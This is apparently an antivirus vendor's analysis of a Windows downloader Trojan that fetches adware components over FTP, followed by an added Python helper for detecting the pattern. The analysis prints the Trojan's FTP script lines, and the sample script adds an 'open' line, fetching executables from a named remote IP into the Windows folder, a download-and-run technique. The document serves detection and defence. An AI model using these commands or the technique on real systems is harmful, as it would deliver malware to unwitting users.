W32/VB.IF!tr.dldr
Analysis
This Trojan downloads components that deliver porn to the compromised system. The related files installed are:
logon.exe - 69,632 bytes
abox.exe - 36,864 bytes
These files are commonly installed to the Windows folder and may be started at logon through the usual Run key in the system registry.
FTP transfer
When the Trojan is first run, it connects to the IP address 209.58.80.244 using the system's own command-line file transfer utility, FTP.EXE. The Trojan first writes an FTP script file named "Abox.ftp" into the TEMP folder and then runs FTP.EXE with the script passed as a parameter (ftp.exe's -s:filename option, which makes it read its commands from a file instead of the console). The script instructs FTP to retrieve files by their remote name and save them to the Windows folder:
get ABox.exe C:\WINNT\ABox.exe
get logon.exe C:\WINNT\logon.exe
get ABox.bup C:\WINNT\ABox.bup
The Windows folder name is determined before the FTP script is created, so the local paths in the script match the infected host (C:\WINNT in the example above). After all files are retrieved, both executables are run. The file "ABox.bup" contains update information for the Trojan.
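As an added example (not part of the original FortiGuard write-up), the following Python flags the two artefacts described above: ftp.exe launched with a -s: script that lives under a Temp folder, and FTP script "get" commands that write files into the Windows folder. The process-creation event fields, the sample events and the sample script are constructed for illustration; the script's "open" line reuses the IP address quoted above, and its "user" line is a placeholder, not a credential taken from the Trojan.

```python
"""Hunting helper for the ftp.exe downloader pattern described above.

Added example, not Fortinet's code. Event field names ("image", "cmdline")
and all sample data below are constructed assumptions.
"""
import re
from typing import Dict, List, Optional, Tuple

# ftp.exe command line: "ftp -s:<scriptfile> [host]"; the path may be quoted.
_SCRIPT_ARG = re.compile(r'-s:(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# "get <remote> [<local>]" lines inside an FTP script file.
_GET_LINE = re.compile(r"^\s*get\s+(\S+)(?:\s+(\S+))?\s*$", re.IGNORECASE)


def script_path_from_cmdline(cmdline: str) -> Optional[str]:
    """Return the -s: script path from an ftp.exe command line, or None."""
    m = _SCRIPT_ARG.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def is_temp_path(path: str) -> bool:
    """True if any path component is Temp/Tmp (also matches 8.3 forms like LOCALS~1\\Temp)."""
    parts = [p.lower() for p in re.split(r"[\\/]", path)]
    return "temp" in parts or "tmp" in parts


def is_suspicious_ftp_launch(image: str, cmdline: str) -> bool:
    """ftp.exe driven by a script file stored in a temp folder, as the Trojan does."""
    basename = re.split(r"[\\/]", image)[-1].lower()
    if basename != "ftp.exe":
        return False
    script = script_path_from_cmdline(cmdline)
    return script is not None and is_temp_path(script)


def flag_events(events: List[Dict[str, str]]) -> List[str]:
    """Command lines of all events that match the suspicious launch pattern."""
    return [e["cmdline"] for e in events if is_suspicious_ftp_launch(e["image"], e["cmdline"])]


def parse_gets(script_text: str) -> List[Tuple[str, str]]:
    """(remote, local) pairs from 'get' commands; local defaults to the remote name."""
    out = []
    for line in script_text.splitlines():
        m = _GET_LINE.match(line)
        if m:
            out.append((m.group(1), m.group(2) or m.group(1)))
    return out


def writes_into_windows_dir(script_text: str, windows_dir: str) -> List[str]:
    """Local targets of 'get' commands that land inside the Windows folder."""
    prefix = windows_dir.rstrip("\\/").lower() + "\\"
    return [local for _, local in parse_gets(script_text)
            if local.lower().replace("/", "\\").startswith(prefix)]


# Constructed process-creation events: one matching the Trojan, two benign.
SAMPLE_EVENTS = [
    {"image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r'ftp -s:"C:\DOCUME~1\user\LOCALS~1\Temp\Abox.ftp" 209.58.80.244'},
    {"image": r"C:\WINNT\system32\ftp.exe",
     "cmdline": r"ftp -s:C:\Scripts\nightly.ftp fileserver"},
    {"image": r"C:\WINNT\system32\cmd.exe",
     "cmdline": r"cmd /c dir"},
]

# Constructed script modelled on the three 'get' lines quoted in the write-up;
# the "user" line is a placeholder (assumption), not data from the sample.
SAMPLE_SCRIPT = r"""open 209.58.80.244
user anonymous placeholder@example.invalid
binary
get ABox.exe C:\WINNT\ABox.exe
get logon.exe C:\WINNT\logon.exe
get ABox.bup C:\WINNT\ABox.bup
quit
"""

if __name__ == "__main__":
    for cmd in flag_events(SAMPLE_EVENTS):
        print("suspicious ftp.exe launch:", cmd)
    for target in writes_into_windows_dir(SAMPLE_SCRIPT, r"C:\WINNT"):
        print("script writes into Windows folder:", target)
```

The launch check deliberately keys on the script living in a Temp folder rather than on the file name "Abox.ftp", since the name is trivial for an attacker to change while the write-to-TEMP-then-run pattern is what the downloader actually needs; the Windows folder passed to writes_into_windows_dir should be the real one for the host being examined.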
Miscellaneous
The file "abox.exe" is referred to as "Fun Box" by the author.
Recommended Action
FortiGate systems:
- check the main screen using the web interface to ensure the latest AV/NIDS database has been downloaded and installed; if required, enable the "Allow Push Update" option
Detection Availability

Product | Detection availability
---|---
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended